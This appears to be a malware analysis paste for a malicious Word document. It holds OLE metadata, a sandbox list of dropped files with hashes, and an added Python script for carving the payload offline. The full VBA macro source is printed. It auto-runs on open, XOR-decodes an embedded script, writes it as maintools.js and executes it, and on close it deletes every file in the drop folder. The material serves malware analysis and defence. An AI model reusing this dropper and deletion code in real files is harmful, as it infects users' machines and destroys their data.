TrashScrape

49b367ac261a722a7c2bbbc328c32545

Apr 11th, 2022
--------------------------------------------------------------------
Maldoc Hash: 49b367ac261a722a7c2bbbc328c32545
--------------------------------------------------------------------
'Root Entry' (root) 13312 bytes
{00020906-0000-0000-C000-000000000046}
  '\x01CompObj' (stream) 114 bytes
  '\x05DocumentSummaryInformation' (stream) 284 bytes
  '\x05SummaryInformation' (stream) 392 bytes
  '1Table' (stream) 8017 bytes
  'Data' (stream) 4096 bytes
  'Macros' (storage)
    'PROJECT' (stream) 483 bytes
    'PROJECTwm' (stream) 65 bytes
    'VBA' (storage)
      'Module1' (stream) 7117 bytes
      'ThisDocument' (stream) 1104 bytes
      '_VBA_PROJECT' (stream) 3467 bytes
      '__SRP_0' (stream) 2964 bytes
      '__SRP_1' (stream) 195 bytes
      '__SRP_2' (stream) 2717 bytes
      '__SRP_3' (stream) 290 bytes
      'dir' (stream) 565 bytes
  'ObjectPool' (storage)
    '_1541577328' (storage)
    {0003000C-0000-0000-C000-000000000046}
      '\x01CompObj' (stream) 76 bytes
      '\x01Ole10Native' (stream) 20301 bytes
      '\x03EPRINT' (stream) 5000 bytes
      '\x03ObjInfo' (stream) 6 bytes
  'WordDocument' (stream) 133755 bytes
['\x05DocumentSummaryInformation']: properties
    1 1252
    5 15
    6 4
    11 False
    12 None
    13 None
    15 b'Olymp'
    16 False
    17 2144
    19 False
    22 False
    23 917504
['\x05SummaryInformation']: properties
    1 1252
    2 b''
    3 b''
    4 b'user'
    5 b''
    7 b'Normal.dotm'
    8 b'John'
    9 b'11'
    10 1601-01-01 00:08:00
    12 2016-11-25 19:04:00
    13 2016-11-25 20:04:00
    14 1
    15 320
    16 1828
    18 b'Microsoft Office Word'
    19 0
Modification/Creation times of all directory entries:
- Root Entry: mtime=2016-11-25 20:04:23.969000 ctime=None
- Data: mtime=None ctime=None
- WordDocument: mtime=None ctime=None
- ObjectPool: mtime=2016-11-25 20:04:23.969000 ctime=2016-11-25 20:04:23.694000
- _1541577328: mtime=2016-11-25 20:04:23.694000 ctime=2016-11-25 20:04:23.694000
- EPRINT: mtime=None ctime=None
- CompObj: mtime=None ctime=None
- ObjInfo: mtime=None ctime=None
- Ole10Native: mtime=None ctime=None
- 1Table: mtime=None ctime=None
- SummaryInformation: mtime=None ctime=None
- DocumentSummaryInformation: mtime=None ctime=None
- Macros: mtime=2016-11-25 20:04:23.696000 ctime=2016-11-25 20:04:23.696000
- VBA: mtime=2016-11-25 20:04:23.696000 ctime=2016-11-25 20:04:23.696000
- dir: mtime=None ctime=None
- Module1: mtime=None ctime=None
- __SRP_0: mtime=None ctime=None
- __SRP_1: mtime=None ctime=None
- __SRP_2: mtime=None ctime=None
- __SRP_3: mtime=None ctime=None
- ThisDocument: mtime=None ctime=None
- _VBA_PROJECT: mtime=None ctime=None
- PROJECT: mtime=None ctime=None
- PROJECTwm: mtime=None ctime=None
- CompObj: mtime=None ctime=None

Properties from SummaryInformation stream:
- codepage: 1252
- title: b''
- subject: b''
- author: b'user'
- keywords: b''
- comments: None
- template: b'Normal.dotm'
- last_saved_by: b'John'
- revision_number: b'11'
- total_edit_time: 480
- last_printed: None
- create_time: datetime.datetime(2016, 11, 25, 19, 4)
- last_saved_time: datetime.datetime(2016, 11, 25, 20, 4)
- num_pages: 1
- num_words: 320
- num_chars: 1828
- thumbnail: None
- creating_application: b'Microsoft Office Word'
- security: 0
Properties from DocumentSummaryInformation stream:
- codepage_doc: 1252
- category: None
- presentation_target: None
- bytes: None
- lines: 15
- paragraphs: 4
- slides: None
- notes: None
- hidden_slides: None
- mm_clips: None
- scale_crop: False
- heading_pairs: None
- titles_of_parts: None
- manager: None
- company: b'Olymp'
- links_dirty: False
- chars_with_spaces: 2144
- unused: None
- shared_doc: False
- link_base: None
- hlinks: None
- hlinks_changed: False
- version: 917504
- dig_sig: None
- content_type: None
- content_status: None
- language: None
- doc_version: None

Root entry name: "Root Entry"
This is a Word document.
type of stream 'WordDocument': 2
size : 133755
---------------------------------------------------------------------
maintools.js EzZETcSXyKAdF_e5I2i1
----------------------------------------------------------------------
Package Name : picture.jpg
Package Name Unicode : picture.jpg
Original File Path : C:\Users\John\Pictures\picture.jpg
Original File Path Unicode : C:\Users\John\Pictures\picture.jpg
Save File Path : C:\Users\John\AppData\Local\Temp\picture.jpg
Save File Path Unicode : C:\Users\John\AppData\Local\Temp\picture.jpg
Content Size : 19.53 KB
Content : 91d8907e81b02b72a82e14d57dc26aff
-------------------------------------------------------------------------
Public OBKHLrC3vEDjVL As String
Public B8qen2T433Ds1bW As String
Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
    Dim THQNfU76nlSbtJ5nX8LY6 As Byte
    THQNfU76nlSbtJ5nX8LY6 = 45
    For i = 0 To M5wI32R3VF2g5B21EK4d - 1
        EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
        THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
    Next i
    Q7JOhn5pIl648L6V43V = True
End Function
Sub AutoClose()
    On Error Resume Next
    Kill OBKHLrC3vEDjVL
    On Error Resume Next
    Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
    R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True
    Set R7Ks7ug4hRR2weOy7 = Nothing
End Sub
Sub AutoOpen()
    On Error GoTo MnOWqnnpKXfRO
    Dim NEnrKxf8l511
    Dim N18Eoi6OG6T2rNoVl41W As Long
    Dim M5wI32R3VF2g5B21EK4d As Long
    N18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)
    NEnrKxf8l511 = FreeFile
    Open (ActiveDocument.FullName) For Binary As #NEnrKxf8l511
    Dim E2kvpmR17SI() As Byte
    ReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)
    Get #NEnrKxf8l511, 1, E2kvpmR17SI
    Dim KqG31PcgwTc2oL47hjd7Oi As String
    KqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)
    Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
    Dim VUy5oj112fLw51h6S
    Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
    VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
    Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
    Dim Y5t4Ul7o385qK4YDhr
    If I4j833DS5SFd34L3gwYQD.Count = 0 Then
        GoTo MnOWqnnpKXfRO
    End If
    For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
        Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
        Exit For
    Next
    Dim Wk4o3X7x1134j() As Byte
    Dim KDXl18qY4rcT As Long
    KDXl18qY4rcT = 16827
    ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
    Get #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
    If Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
        GoTo MnOWqnnpKXfRO
    End If
    B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
    Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
    If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
        B8qen2T433Ds1bW = Environ("appdata")
    End If
    Set R7Ks7ug4hRR2weOy7 = Nothing
    Dim K764B5Ph46Vh
    K764B5Ph46Vh = FreeFile
    OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js"
    Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
    Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
    Close #K764B5Ph46Vh
    Erase Wk4o3X7x1134j
    Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
    R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"
    ActiveDocument.Save
    Exit Sub
MnOWqnnpKXfRO:
    Close #K764B5Ph46Vh
    ActiveDocument.Save
End Sub
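The macro's payload-hiding scheme can be reproduced offline, which is usually faster and safer than detonating the document to recover the dropped script. The Python below is an added example written for this page, not code from the paste or from the sample: it ports Q7JOhn5pIl648L6V43V and the offset arithmetic of AutoOpen so the embedded script can be carved from the .doc on disk without running the macro. The marker string, the key constants (45, 99, 254) and the 16828-byte length are lifted from the macro text above; the output file name and the constructed test document are assumptions.

```python
"""
Rolling-XOR payload carver for the macro above (added example, not part of
the paste). Re-implements Q7JOhn5pIl648L6V43V and AutoOpen's offset logic so
the embedded maintools.js can be recovered from the .doc without executing it.
"""

# Constants lifted from the macro source above.
MARKER = b"MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
PAYLOAD_LEN = 16827 + 1   # ReDim Wk4o3X7x1134j(16827) -> 16828 elements (0..16827)
INITIAL_KEY = 45          # THQNfU76nlSbtJ5nX8LY6 = 45
KEY_CONST = 99            # ... Xor 99
KEY_MOD = 254             # ... Xor (i Mod 254)


def rolling_xor(data: bytes) -> bytes:
    """Port of Q7JOhn5pIl648L6V43V: XOR each byte with a key that is re-derived
    after every byte. The key schedule depends only on the index, not on the
    data, so the same routine both encodes and decodes."""
    key = INITIAL_KEY
    out = bytearray(len(data))
    for i, b in enumerate(data):
        out[i] = b ^ key
        # VBA keeps the key in a Byte; (key ^ 99) ^ (i % 254) never exceeds 255.
        key = (key ^ KEY_CONST) ^ (i % KEY_MOD)
    return bytes(out)


def payload_offset(doc: bytes) -> int:
    """Locate the ciphertext the way AutoOpen does.

    StrConv(bytes, vbUnicode) maps byte i to string index i, RegExp.FirstIndex
    is 0-based, and VBA's `Get #f, pos` takes a 1-based file position, so
    'FirstIndex + 81' is 0-based offset FirstIndex + 80: the 80-character
    marker is immediately followed by the encoded script. The macro's pattern
    is a literal string, so a plain substring search is equivalent."""
    idx = doc.find(MARKER)
    if idx < 0:
        raise ValueError("marker not found; document is not this variant")
    return idx + len(MARKER)


def carve_payload(doc: bytes, length: int = PAYLOAD_LEN) -> bytes:
    """Return the decoded payload (maintools.js for this sample)."""
    start = payload_offset(doc)
    return rolling_xor(doc[start:start + length])


def build_test_doc(script: bytes) -> bytes:
    """Constructed fixture, NOT the real sample: filler bytes, the marker, then
    `script` encoded with the same schedule the macro reverses at run time."""
    return b"\x00" * 4096 + MARKER + rolling_xor(script) + b"\x00" * 512


if __name__ == "__main__":
    import sys
    # Usage (file names are assumptions): python carve.py sample.doc
    with open(sys.argv[1], "rb") as fh:
        js = carve_payload(fh.read())
    with open("maintools.js.decoded", "wb") as fh:
        fh.write(js)
    print(f"wrote {len(js)} bytes")
```

Given the .doc as its only argument, the script writes the decoded payload beside it; comparing that output against the MD5 5EA3FD094B69E9E00894842F95FD5D85 listed for maintools.js in the sandbox capture below confirms the carve. Worth noting from the macro itself: AutoClose deletes every file in the drop directory (%APPDATA%\Microsoft\Windows\*.*, or %APPDATA% when that folder is missing), not only maintools.js, so on a real victim the script body and anything else in that folder may be gone by the time the document is closed.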
--------------------------------------------------
Malware Drop:
--------------------------------------------------

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C07F9B5.emf
File Type:  Windows Enhanced Metafile (EMF) image data version 0x10000
MD5:    EB10732AA3F3BB122DC9452917A62FA1
SHA1:   19EE431B257833CBCA0868DCA5BCE19A81205DC5
SHA-256:    750987BD6026CC8C515D0B6D65FFBE5BCBF7824EE56E82128D220EEF86390874
SHA-512:    6043E5CA7627CED98A2785E2E103D2735E588DA0BA7ABA64FA9906ACB5505C4EFCF4D02F44A8C3B506C14D8AB4955192C49EAEF23A250AB287A581B3254C7C36

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61B24A8B.emf
File Type:  Windows Enhanced Metafile (EMF) image data version 0x10000
MD5:    FDBBE99A5DD164B403945E6A98434CC1
SHA1:   16A5869904B7A7C54B0262B1B83B5C4B36F581EB
SHA-256:    D416447FB0A6AA8F66CB9C943B7FFDA365CE56D2AD8AC12AC0154EF8A52D1CA0
SHA-512:    6A608C28D41A9A09E4E0B9BE8E3EFC88BAAD44D0F92708176FB76B9900F46AC3D3F4C9C45D0A694D028F129085EBE8B2C2A80EB9308799B6403C69178CE3A83B

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C92CC32.emf
File Type:  Windows Enhanced Metafile (EMF) image data version 0x10000
MD5:    FDBBE99A5DD164B403945E6A98434CC1
SHA1:   16A5869904B7A7C54B0262B1B83B5C4B36F581EB
SHA-256:    D416447FB0A6AA8F66CB9C943B7FFDA365CE56D2AD8AC12AC0154EF8A52D1CA0
SHA-512:    6A608C28D41A9A09E4E0B9BE8E3EFC88BAAD44D0F92708176FB76B9900F46AC3D3F4C9C45D0A694D028F129085EBE8B2C2A80EB9308799B6403C69178CE3A83B

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{570A205C-645C-4995-BCAD-8D4566A2D524}.tmp
File Type:  FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
MD5:    5D4D94EE7E06BBB0AF9584119797B23A
SHA1:   DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:    4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:    95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B98AD5AC-9AA1-42F5-81F6-596A6B184300}.tmp
File Type:  data
MD5:    2395DEC0A691F71650A4095EB5E05A34
SHA1:   56903ED3513DAE0E1ABAFF66A2BB97B4D49B9C9E
SHA-256:    EEAD99619FE079B2DBFBF25A674C8D475B37E208AA2CEE428AFC488BC662FD09
SHA-512:    B2DDFEBEB9609F80F9843BC59F6E8B94E3A0F7DC158A6269FEB3199289D3FE784DD820B2B3021F5D24542B11C8E6A9EF29342AFBE8C09D87540FB1F8B87AE5AD

C:\Users\user\AppData\Local\Microsoft\Windows\maintools.js
File Type:  ASCII text, with very long lines, with CRLF line terminators
MD5:    5EA3FD094B69E9E00894842F95FD5D85
SHA1:   318F06FF16CA0FD98FEBE2A777064F0A428163C3
SHA-256:    3A065547ADB0AFC63E318C2FA1F682108664E602934490A898C3DE1B23975628
SHA-512:    3E406F5965481348F937D5B0E5433486B727D4F782AC4D67E6898949E3F13ADF5DB152127D1635D733CA4AE5E5A0741656F27A350C3A82A2BF4854E8B7831C02
Malicious:  false

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\FJv6MQfMYp.LNK
File Type:  MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 14:00:27 2017, mtime=Sun Sep 24 14:00:27 2017, atime=Wed Oct  4 14:15:38 2017, length=201216, window=hide
MD5:    9F3F92427821D76F074286502717BD32
SHA1:   206DDA573C78EF1900DFAAEFDBD4D82C851AEEA5
SHA-256:    311F47C14B793048FEE343B45BAF8AB1FD2144B489988C8689AD18F15374AD8A
SHA-512:    828675605CC6D8460252D92D6423C5202422F8C1A38CCCD31E1EDE402055A2D852E446723E3ACA6A70BE84F2B6FB74A1817D31BE36FC147E5EBF7DC05D4F17CF

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type:  ASCII text, with CRLF line terminators
MD5:    127D8F99975C8FA1D0974D8191BA7A52
SHA1:   77943D3D71FA1F37C3692A1F38052E87E3BEA892
SHA-256:    394D91597EF0C448F9D4B843F7DF3F445549FA9EE4B4B65955A8A709FC261AC0
SHA-512:    E24D8C5D8ACB45CAA8A60E2F993BAE0AD8A9D03EE545AE8647DE1404224FE636DFE4EC7A2D84223F773B940CC36F264CFD32EDDB5C7D3DCD8260A1D0CAEAD3A0

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
File Type:  data
MD5:    3E7BD24815610B9CFB276BECD6CE969F
SHA1:   55D998570D5B808657E7C140888B339F657E15C4
SHA-256:    0D1CF856000A144E9D320940FA37FFD38C9B45A19A149513D70A31EAD7F34593
SHA-512:    47F506312D879F3FAF033BEF23EC3AA67E7ADD90AFD85DE82BD492FCE41D04AF8724CEF38FB7823C0E3053777E1FA62183BAC9C51409F44D219365B94043CBC5

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
File Type:  Little-endian UTF-16 Unicode text, with no line terminators
MD5:    F3B25701FE362EC84616A93A45CE9998
SHA1:   D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:    B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:    98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84

C:\Users\user\AppData\Roaming\Microsoft\Windows\maintools.js
File Type:  ASCII text, with very long lines, with CRLF line terminators
MD5:    5EA3FD094B69E9E00894842F95FD5D85
SHA1:   318F06FF16CA0FD98FEBE2A777064F0A428163C3
SHA-256:    3A065547ADB0AFC63E318C2FA1F682108664E602934490A898C3DE1B23975628
SHA-512:    3E406F5965481348F937D5B0E5433486B727D4F782AC4D67E6898949E3F13ADF5DB152127D1635D733CA4AE5E5A0741656F27A350C3A82A2BF4854E8B7831C02

C:\Users\user\Desktop\~$v6MQfMYp.doc
File Type:  data
MD5:    3E7BD24815610B9CFB276BECD6CE969F
SHA1:   55D998570D5B808657E7C140888B339F657E15C4
SHA-256:    0D1CF856000A144E9D320940FA37FFD38C9B45A19A149513D70A31EAD7F34593
SHA-512:    47F506312D879F3FAF033BEF23EC3AA67E7ADD90AFD85DE82BD492FCE41D04AF8724CEF38FB7823C0E3053777E1FA62183BAC9C51409F44D219365B94043CBC5